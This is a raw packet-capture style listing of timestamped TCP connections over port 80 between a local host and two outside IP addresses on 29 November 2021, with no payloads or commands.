                                                                                                                                                    Nov 29, 2021 14:09:58.865880966 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.866039991 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.866050959 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.866106987 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.866219997 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.866353989 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.866394997 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.866621971 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.866719961 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.866775036 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.866983891 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.867261887 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867368937 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867403984 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867443085 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.867522955 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867557049 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867588997 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867618084 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.867712021 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867796898 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.867954016 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.867970943 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.868011951 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868043900 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868074894 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868105888 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868138075 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868145943 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.868189096 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868220091 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868252993 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868283987 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868314981 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.868323088 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.868366957 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.875027895 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877403021 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877505064 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877547026 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877602100 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877635002 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.877873898 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878237009 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878284931 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878408909 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878684044 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878748894 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.878889084 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879487038 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879537106 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879594088 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879626036 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879745007 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.879981995 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.884542942 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.937305927 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.937355995 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.937612057 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.937671900 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.948868990 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995028973 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995207071 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995254993 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.995280027 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.995341063 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:34.395545006 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.553196907 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.553535938 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.554991961 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.555094004 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.712912083 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713017941 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713076115 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713120937 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713126898 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713185072 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713232040 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713268995 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713325977 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713365078 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713401079 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713527918 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713587999 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713644028 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.713707924 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.713865042 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.714075089 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.716610909 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.716801882 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.716861010 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.870913029 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871009111 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871124983 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871146917 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871182919 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871298075 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871329069 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871373892 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871392965 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871503115 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871536970 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871558905 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871692896 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871767044 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871797085 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871859074 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.871917009 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.871946096 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872018099 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872040033 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872040033 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872132063 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872134924 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872313976 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872396946 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.872488976 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.872664928 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.877321959 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.878040075 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.878144026 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.878326893 CET4983580192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:34.912861109 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:34.913027048 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.028831959 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.028911114 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.028944969 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.028984070 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029019117 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029083967 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029128075 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029311895 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029371977 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029450893 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029479980 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029594898 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029647112 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029664040 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.029722929 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029839039 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.029962063 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.030042887 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030086040 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030101061 CET4983480192.168.11.20192.64.119.254
                                                                                                                                                    Nov 29, 2021 14:10:35.030168056 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030221939 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030268908 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030311108 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030343056 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030374050 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030405045 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030436039 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030466080 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.030497074 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.038759947 CET8049835192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.070578098 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.186912060 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.187306881 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188060045 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188308954 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188502073 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188627005 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188791990 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.188915968 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189075947 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189333916 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189460993 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189467907 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189582109 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189706087 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:35.189958096 CET8049834192.64.119.254192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.913897038 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.922883987 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.923223019 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.924544096 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.924685001 CET4983780192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.924715996 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.933501959 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.933610916 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.933677912 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.933727980 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.933789968 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.935460091 CET804983734.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935592890 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935655117 CET4983780192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.935733080 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935751915 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935775042 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.935796022 CET4983780192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.935822964 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.935866117 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935873985 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.935892105 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935904980 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.935965061 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.936052084 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.936127901 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.936229944 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.936404943 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.944719076 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.944868088 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.944868088 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.944891930 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.944915056 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.944953918 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.945123911 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.945285082 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.946718931 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.946734905 CET804983734.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.946808100 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.946865082 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.946911097 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.946943998 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.946958065 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947052956 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.947201967 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947216988 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947231054 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.947329044 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947349072 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947360992 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947372913 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947384119 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947443962 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947457075 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947474003 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947485924 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947498083 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.947603941 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.947767973 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.955882072 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956007957 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956026077 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.956073046 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.956165075 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.956208944 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956231117 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956337929 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.956404924 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956525087 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.956571102 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956585884 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956598043 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.956692934 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.956868887 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.957761049 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.957889080 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.957914114 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.958007097 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958018064 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.958228111 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958333969 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958369970 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.958456039 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.958478928 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958621979 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958636045 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958648920 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958719015 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.958753109 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958823919 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958849907 CET4983680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:10:39.958952904 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.958967924 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959079027 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959096909 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959111929 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959125042 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959136963 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959211111 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959224939 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959243059 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959342003 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959361076 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959372997 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959383965 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959395885 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959408045 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959419966 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959445000 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959456921 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959469080 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.959485054 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967029095 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967138052 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967251062 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967405081 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967516899 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967638016 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967650890 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967762947 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.967776060 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968030930 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968050003 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968063116 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968076944 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968089104 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968101025 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.968137026 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969075918 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969196081 CET804983634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:10:39.969213009 CET804983634.102.136.180192.168.11.20
